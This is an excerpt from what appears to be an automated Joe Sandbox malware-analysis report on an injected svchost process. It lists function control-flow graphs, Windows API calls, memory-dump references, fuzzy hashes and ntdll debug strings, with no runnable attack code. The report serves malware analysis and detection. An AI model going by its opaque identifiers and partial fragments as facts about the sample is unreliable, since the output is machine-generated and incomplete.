                                                                                                                                                                              control_flow_graph 0 414755-414757 1 414759-41475b 0->1 2 4147c8 0->2 3 414701 1->3 4 41475d-414769 1->4 5 4147d6-4147da 2->5 6 4147ca-4147ce 2->6 8 414707-41472d call 4255c3 3->8 9 414702 call 404ab3 3->9 14 41476b-41476f 4->14 10 4147b3-4147b6 5->10 11 4147dc-4147e0 5->11 6->5 7 4147d0-4147d4 6->7 7->5 13 4147e1-4147f1 7->13 24 41474d-414753 8->24 25 41472f-41473e PostThreadMessageW 8->25 9->8 10->5 15 4147b8-4147bc 10->15 17 414771-414776 14->17 18 41478d-414793 14->18 15->5 19 4147be-4147c2 15->19 17->18 21 414778-41477d 17->21 18->14 22 414795-414798 18->22 19->5 23 4147c4 19->23 21->18 26 41477f-414786 21->26 23->2 25->24 27 414740-41474a 25->27 28 414799-41479c 26->28 29 414788-41478b 26->29 27->24 29->18 29->28
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734
                                                                                                                                                                              • Opcode ID: 2ed264441507fbf0aaac25a226f0c8523722d2fda7b05f78481507a21394782d
                                                                                                                                                                              • Instruction ID: 1e21b958a9a12c425568f2054e8e2c9374c825e4e9be2e075179da2340d4daca
                                                                                                                                                                              • Opcode Fuzzy Hash: 2ed264441507fbf0aaac25a226f0c8523722d2fda7b05f78481507a21394782d
                                                                                                                                                                              • Instruction Fuzzy Hash: ED115CB19441493DEB309AB85C81CFB7B9C99C3778B09429FE874973D2D72A8CC28758
                                                                                                                                                                              Function 0041469D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734
                                                                                                                                                                              • Opcode ID: 1d1ed5e97965d45552a22b0d880ab8e495eb5ede32c7198b53bf829405d448ee
                                                                                                                                                                              • Instruction ID: 95d780f5653422b82f245627d186ad078874060630583719c964325d9ebc3d39
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d1ed5e97965d45552a22b0d880ab8e495eb5ede32c7198b53bf829405d448ee
                                                                                                                                                                              • Instruction Fuzzy Hash: EA115073E4011C7ADB1096A9AC41DEFFBBCDF81358F44807AF914A7201D63C5E428BA4
                                                                                                                                                                              Function 004146B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734
                                                                                                                                                                              • Opcode ID: 446e56cdc98949a691bf5b66ae0708e810528e07d05728e93538d0b49f9b8487
                                                                                                                                                                              • Instruction ID: 1a440575556439c8d8d504a8e7a210be9fda86e9d8b636128756369ec3658bf1
                                                                                                                                                                              • Opcode Fuzzy Hash: 446e56cdc98949a691bf5b66ae0708e810528e07d05728e93538d0b49f9b8487
                                                                                                                                                                              • Instruction Fuzzy Hash: 88110A72D4111CBEEB10DB95DC81DEF7B7CEF41754F01406AF614A7240D6394E068BA5
                                                                                                                                                                              Function 004146C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734
                                                                                                                                                                              • Opcode ID: a8a12cd4ecb34db59fd132339cca9cd1391b09b45c2f06034069b0f6fef1d0f7
                                                                                                                                                                              • Instruction ID: 56d41811e5e1ddcf713e5c7b642e6612b2b9c68ae4758a5162f81525a6224217
                                                                                                                                                                              • Opcode Fuzzy Hash: a8a12cd4ecb34db59fd132339cca9cd1391b09b45c2f06034069b0f6fef1d0f7
                                                                                                                                                                              • Instruction Fuzzy Hash: E8012B72D4021C7AEB10DAE59C81DEFBB7CDF41398F454069FA14B7241D5384E068BA5
                                                                                                                                                                              Function 0041467E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43threadwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 81 41467e-41472d call 417e93 call 404ab3 call 4255c3 89 41474d-414753 81->89 90 41472f-41473e PostThreadMessageW 81->90 90->89 91 414740-41474a 90->91 91->89
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(40mEe3Hg,00000111,00000000,00000000), ref: 0041473A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                              • String ID: 40mEe3Hg$40mEe3Hg
                                                                                                                                                                              • API String ID: 1836367815-3051319734
                                                                                                                                                                              • Opcode ID: d5ff2509479acaed69c22f0ebb61f311e9c8ada7f24bb6b516d54cef981e14ca
                                                                                                                                                                              • Instruction ID: 8f65e58832d4b8b89b27145bc530319af6b5207bc3e1fd328e9c98037b7b6cee
                                                                                                                                                                              • Opcode Fuzzy Hash: d5ff2509479acaed69c22f0ebb61f311e9c8ada7f24bb6b516d54cef981e14ca
                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0F672E4025C7AEB109A949C81DFFB7BCDE81754F45806AFA14B7240D63C4E024BA5
                                                                                                                                                                              Function 0042D193 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 92 42d193-42d1d7 call 404b43 call 42e073 RtlFreeHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D1D2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                              • String ID: kA
                                                                                                                                                                              • API String ID: 3298025750-1675843574
                                                                                                                                                                              • Opcode ID: d27725976a4045937e6c3cf2224952633ed6bfd44668ba819dae99e28ffe7e1c
                                                                                                                                                                              • Instruction ID: 4a3964a4f0a3a76f8d4521e1a62d6de28cae1064660ae1ef7f2e24c453d31f5e
                                                                                                                                                                              • Opcode Fuzzy Hash: d27725976a4045937e6c3cf2224952633ed6bfd44668ba819dae99e28ffe7e1c
                                                                                                                                                                              • Instruction Fuzzy Hash: 75E06D71204214BBDA10EE9AEC41F9B77ACEFC9710F00441EFE09A7241D671B91186B8
                                                                                                                                                                              Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 113 42d143-42d187 call 404b43 call 42e073 RtlAllocateHeap
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,0041ECBE,?,?,00000000,?,0041ECBE,?,?,?), ref: 0042D182
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: 15120137f2e220d0141239fc64249b4d2685d1faead98022e868864a051e874d
                                                                                                                                                                              • Instruction ID: 468bfc51cc84190aa54521f22c45090c91e47f19d2386075b415402c80ad2e80
                                                                                                                                                                              • Opcode Fuzzy Hash: 15120137f2e220d0141239fc64249b4d2685d1faead98022e868864a051e874d
                                                                                                                                                                              • Instruction Fuzzy Hash: 82E06DB23002147BD610EE59DC41F9B73ACEFC6714F000019FA09A7241D671B91086B9
                                                                                                                                                                              Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 123 42d1e3-42d21c call 404b43 call 42e073 ExitProcess
                                                                                                                                                                              APIs
                                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,80D8F95D,?,?,80D8F95D), ref: 0042D217
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                              • Opcode ID: c8e8f64843b037c0eb56e4c593846ff9457318cc6a9d331e3580016256164a7b
                                                                                                                                                                              • Instruction ID: fd4277e8f341337d6eff74e574bced11f9f41178322f6e6b8835bc339a2b6e4f
                                                                                                                                                                              • Opcode Fuzzy Hash: c8e8f64843b037c0eb56e4c593846ff9457318cc6a9d331e3580016256164a7b
                                                                                                                                                                              • Instruction Fuzzy Hash: B4E086723402147BD210EA5AEC02F97B7ACDFC5754F10841AFB0867182D6B5B90187F4
                                                                                                                                                                              Function 03072C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 128 3072c0a-3072c0f 129 3072c11-3072c18 128->129 130 3072c1f-3072c26 LdrInitializeThunk 128->130
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: e3b92376376056dd122cbe8410babdc9309be898e7d0726aea8d35adae4963fb
                                                                                                                                                                              • Instruction ID: 978ff8379b2714e3c8432404cb067043a0d8e278491b8802dcd243ad10882349
                                                                                                                                                                              • Opcode Fuzzy Hash: e3b92376376056dd122cbe8410babdc9309be898e7d0726aea8d35adae4963fb
                                                                                                                                                                              • Instruction Fuzzy Hash: 3BB09B71D035C9C5EA51F7604608717794967D0701F59C461D3430645F4739C1D1E175

                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                              Function 030B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                                              • Opcode ID: cd6b9eb5fd196b5e77b98da1cf61243c988cff8c3996d502c08cf245b1ba75f8
                                                                                                                                                                              • Instruction ID: 7e1d42b5e95240b4ace52c6fae4b4ef91a56037da577e7bd1ad378f691ac07df
                                                                                                                                                                              • Opcode Fuzzy Hash: cd6b9eb5fd196b5e77b98da1cf61243c988cff8c3996d502c08cf245b1ba75f8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9292587560A341ABD725DE24C880BABB7FCBB88750F184D2DFA94DB250D770E844CB96
                                                                                                                                                                              Function 030268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-3089669407
                                                                                                                                                                              • Opcode ID: 34c5a25b0bbf6b468097c9c37da5149b99e15559becc3df426445d9f74965ebb
                                                                                                                                                                              • Instruction ID: d2857abe527f878acbbc7b7c683fbf7aaa860539f6aec1f8d2c2444dac64bfc9
                                                                                                                                                                              • Opcode Fuzzy Hash: 34c5a25b0bbf6b468097c9c37da5149b99e15559becc3df426445d9f74965ebb
                                                                                                                                                                              • Instruction Fuzzy Hash: CC8101B6D032187F9B16FB98DDC4EEEB7BEAB58610B044421B910FB114E721ED548BB0
                                                                                                                                                                              Function 03068620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • Critical section debug info address, xrefs: 030A541F, 030A552E
                                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 030A5508
                                                                                                                                                                              • Critical section address., xrefs: 030A5502
                                                                                                                                                                              • Critical section address, xrefs: 030A5425, 030A54BC, 030A5534
                                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54CE
                                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 030A5543
                                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54E2
                                                                                                                                                                              • Thread identifier, xrefs: 030A553A
                                                                                                                                                                              • 8, xrefs: 030A52E3
                                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 030A542B
                                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A540A, 030A5496, 030A5519
                                                                                                                                                                              • corrupted critical section, xrefs: 030A54C2
                                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 030A54B6
                                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 030A54AE, 030A54FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                                              • Opcode ID: 2fe396a9bda189fd5cee1ade8ca23bbe4ac13c327e0c3928ef2f177c06abb9b4
                                                                                                                                                                              • Instruction ID: 05a912d8470b3a1d0d4ebad9db8dd29e82ab4c33e1cc9876ddf294650a63ccbc
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fe396a9bda189fd5cee1ade8ca23bbe4ac13c327e0c3928ef2f177c06abb9b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 87819CB1A02758AFDB20CF98DC40BAEBBF9FB49704F148159F558BB641D3B1A940CB64
                                                                                                                                                                              Function 03060F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                                              • API String ID: 0-360209818
                                                                                                                                                                              • Opcode ID: 865ae5aa7a9d7064c5307bc09d5ab823507ca28146658e773f5f9eebfb7fdf09
                                                                                                                                                                              • Instruction ID: 07c188140329b1d834052b7aabf5d9ac8a2b799eab74b8400ea794f80bc635d3
                                                                                                                                                                              • Opcode Fuzzy Hash: 865ae5aa7a9d7064c5307bc09d5ab823507ca28146658e773f5f9eebfb7fdf09
                                                                                                                                                                              • Instruction Fuzzy Hash: 5462C0B5E026298FDB68CF58D8407ADB7F6BF85310F1882DAD449AB240D7725AE1CF40
                                                                                                                                                                              Function 030E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                                              • Opcode ID: 5378d35edcc610b719b2d0ead884de4fd886fb07ebe7b5ff8d5fb4bce4023cac
                                                                                                                                                                              • Instruction ID: 8ecbc226705e39d5a9a3d32a58087f5e247ca1b15f774d5cd9841f258c36e171
                                                                                                                                                                              • Opcode Fuzzy Hash: 5378d35edcc610b719b2d0ead884de4fd886fb07ebe7b5ff8d5fb4bce4023cac
                                                                                                                                                                              • Instruction Fuzzy Hash: A512BC75706642DFD729CF28C441BBAFBF5EF49704F188899E4968BA81D738E880CB50
                                                                                                                                                                              Function 0304AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                              • API String ID: 0-3197712848
                                                                                                                                                                              • Opcode ID: 10a0b51bfe1bc27d2508ff06441ab61b6e637660fb694791e0e686ce045bcb72
                                                                                                                                                                              • Instruction ID: 9de5049347c7334c8c93c82ec89aeb01680b31bda20392c43fd2d424abacbda1
                                                                                                                                                                              • Opcode Fuzzy Hash: 10a0b51bfe1bc27d2508ff06441ab61b6e637660fb694791e0e686ce045bcb72
                                                                                                                                                                              • Instruction Fuzzy Hash: 4012FFB1A0A3419FD764DF28C440BAEB3E4FFC5704F08496AF9858B291E734DA44CB92
                                                                                                                                                                              Function 0302D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                                                              • Opcode ID: d9cdaef6c8b41055ee5582c37bb1e741f218b928fccf42199f0a308bd3f5cdf3
                                                                                                                                                                              • Instruction ID: be7b45f7d030e641e8e246dcf08494377f416c01585208560dec6cced681689e
                                                                                                                                                                              • Opcode Fuzzy Hash: d9cdaef6c8b41055ee5582c37bb1e741f218b928fccf42199f0a308bd3f5cdf3
                                                                                                                                                                              • Instruction Fuzzy Hash: 02B1AD7190A3619FC761EF24C480AAFBBE8AF88754F054D2EF899DB240D770DD448B92
                                                                                                                                                                              Function 030E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                                              • API String ID: 0-1357697941
                                                                                                                                                                              • Opcode ID: ebc7e0432f95f0a44720f6c17b46a81c16b8842db9155c83d85f4cc66a70892f
                                                                                                                                                                              • Instruction ID: c13b29938e4f45e27828205e5afa29e8410bf6de1dd4daf85b36a18e26911157
                                                                                                                                                                              • Opcode Fuzzy Hash: ebc7e0432f95f0a44720f6c17b46a81c16b8842db9155c83d85f4cc66a70892f
                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF11335B06256EFCB25CF6AC440BEAFBF5FF0A300F088459E4959B692C7B4A945CB50
                                                                                                                                                                              Function 030C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                                                              • Opcode ID: 13f01cd4069fab49287ed2cd382df961e0044e8ce47aafd86940c262176e31b4
                                                                                                                                                                              • Instruction ID: de18be8177d52b8ed8fe643531c5fd871afc683f55c0e962587bee952fdc10e5
                                                                                                                                                                              • Opcode Fuzzy Hash: 13f01cd4069fab49287ed2cd382df961e0044e8ce47aafd86940c262176e31b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 78D1E2B281A395AFD721DB64C840BAFB7ECAFC4B14F04496DFA849B190D770C9448B96
                                                                                                                                                                              Function 030E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                              • API String ID: 0-1700792311
